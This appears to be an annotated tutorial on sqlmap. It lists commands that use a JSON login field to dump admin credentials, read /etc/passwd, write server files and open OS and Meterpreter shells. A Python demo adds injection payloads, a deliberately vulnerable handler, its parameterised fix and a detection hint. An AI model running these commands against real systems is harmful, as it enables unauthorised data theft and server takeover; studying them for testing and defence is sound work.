Today 远哥 put together a list of the most commonly used sqlmap commands.
First capture the target request with BurpSuite or another proxy/packet-capture tool and save it as a raw HTTP request file (in Burp: right-click the request, "Copy to file"). sqlmap's -r option reads that file, so it must contain the complete request: request line, headers, blank line and body.
Example Payload.txt (headers one per line, then a blank line, then the JSON body; the Content-Length below is left over from the original capture and is larger than the body shown here, so if you shorten a body by hand either correct that header or delete it rather than leaving a stale value):
POST /Api/Login HTTP/1.1
Host: api.xxxx.com:8080
Content-Length: 167
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://api.xxxx.com
Referer: http://api.xxxx.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION=af4085ec-e398-48cc-ba68-3e312a6c1ea4
Connection: close

{"requestcommand":"Login","debug":true,"userName":"test","password":"123456","lang":"cn"}
Assume the userName field of the JSON body is the injection point. Because the Content-Type is JSON, sqlmap parses the body and injects into the JSON values; -p userName restricts testing to that one field. The commands below build on each other: enumerate first, confirm privileges, and only then try the file and OS-level options, which depend on the database user's rights. Commonly used commands:
// SQL injection: enumerate the databases (how many, and their names)
sqlmap -r "/local/Payload.txt" -p userName --dbs
// List all tables in a given database
sqlmap -r "/local/Payload.txt" -p userName --tables -D "CmsDb"
// List all columns of a given table
sqlmap -r "/local/Payload.txt" -p userName --columns -T "admin_user" -D "CmsDb"
// Dump the rows of a table, restricted to the named columns
sqlmap -r "/local/Payload.txt" -p userName --dump -T "admin_user" -D "CmsDb" -C "name,password"
// Show the current database user's privileges (the original wrote --privileg, which sqlmap accepts as an unambiguous abbreviation; the full option is --privileges). Check here whether the FILE privilege is granted: every --file-* and --os-* option below depends on it, and on MySQL also on secure_file_priv not blocking the target directory
sqlmap -r "/local/Payload.txt" -p userName --privileges
// Get an OS shell: sqlmap has to write a web backdoor (file stager) onto the server, so it needs the FILE privilege plus a writable directory that is reachable over HTTP (sqlmap prompts for the web root)
sqlmap -r "/local/Payload.txt" -p userName --os-shell
// Run a single OS command on the server (ipconfig is a Windows command; the /etc/passwd examples below assume a Linux target, so pick the command for the OS you actually fingerprinted)
sqlmap -r "/local/Payload.txt" -p userName --os-cmd=ipconfig
// Interactive SQL shell
sqlmap -r "/local/Payload.txt" -p userName --sql-shell
sql-shell> select version();
select version();:    '5.7.34'
// Reverse / out-of-band shell: --os-pwn prompts for a Meterpreter or VNC session and requires Metasploit installed on the attacking machine
sqlmap -r "/local/Payload.txt" -p userName --os-pwn
// Read a file from the server (the two spellings of the option are equivalent)
sqlmap -r "/local/Payload.txt" -p userName --file-read=/etc/passwd
sqlmap -r "/local/Payload.txt" -p userName --file-read "/etc/passwd"
// Write a local file to a path on the server (again needs FILE privilege and a destination the database process may write to)
sqlmap -r "/local/Payload.txt" -p userName --file-write /local/test.txt --file-dest /home/www/test.txt
sqlmap -r "/local/Payload.txt" -p userName --file-write /root/hello.txt --file-dest /root/hello.txt
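What sqlmap is actually exploiting when it reports userName as injectable, and what the fix looks like, as an added example that is not code from the original post: a minimal stand-in for the /Api/Login handler. The page never shows the server side, so this handler, the in-memory SQLite database standing in for the MySQL 5.7 seen in the sql-shell, and the admin_user rows are all constructed assumptions. login_vulnerable pastes the JSON userName and password values into the SQL text; login_safe binds them as parameters. is_injectable replays the kind of true/false pair sqlmap sends before it ever runs --dbs, and dump_passwords shows the UNION trick behind --dump -C "name,password". The payloads end in "-- " with a trailing space because MySQL requires it for a comment; SQLite accepts it too.

```python
import json
import sqlite3


def make_db():
    """Constructed stand-in for CmsDb.admin_user (SQLite in memory instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_user (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin_user VALUES (?, ?)",
                     [("admin", "s3cret"), ("test", "123456")])
    return conn


def login_request(user_name, password="123456"):
    """Build a body with the same shape as the one in Payload.txt."""
    return json.dumps({"requestcommand": "Login", "debug": True,
                       "userName": user_name, "password": password, "lang": "cn"})


def login_vulnerable(conn, body):
    """Hypothetical /Api/Login handler: userName and password are pasted into the SQL text."""
    req = json.loads(body)
    sql = ("SELECT name FROM admin_user WHERE name = '%s' AND password = '%s'"
           % (req["userName"], req["password"]))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, body):
    """Same handler with bound parameters: user input can never become SQL syntax."""
    req = json.loads(body)
    sql = "SELECT name FROM admin_user WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (req["userName"], req["password"]))]


def is_injectable(conn, handler):
    """Boolean-based check in the style sqlmap runs before --dbs: two requests that differ
    only in the truth of an appended condition. The trailing "-- " comments out the
    password clause, so a deliberately wrong password is supplied to prove the point."""
    true_case = handler(conn, login_request("test' AND 1=1-- ", password="wrong"))
    false_case = handler(conn, login_request("test' AND 1=2-- ", password="wrong"))
    return true_case != false_case


def dump_passwords(conn, handler):
    """The UNION technique behind --dump: the original SELECT matches nothing ('x'),
    the appended SELECT returns the password column through the name field."""
    payload = "x' UNION ALL SELECT password FROM admin_user-- "
    return sorted(handler(conn, login_request(payload, password="wrong")))


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable handler injectable:", is_injectable(conn, login_vulnerable))
    print("safe handler injectable:      ", is_injectable(conn, login_safe))
    print("dumped via UNION (vulnerable):", dump_passwords(conn, login_vulnerable))
    print("dumped via UNION (safe):      ", dump_passwords(conn, login_safe))
```

Against login_vulnerable the 1=1 and 1=2 requests return different results, which is exactly the signal sqlmap uses to declare the parameter injectable, and the UNION payload pulls every password out through the login response. Against login_safe both probes return nothing, so --dbs and --dump have nothing to work with. The same pair of requests is also a cheap detection rule on the defending side: two bodies to /Api/Login that differ only by an appended 1=1 / 1=2 inside a JSON string field are a sqlmap fingerprint.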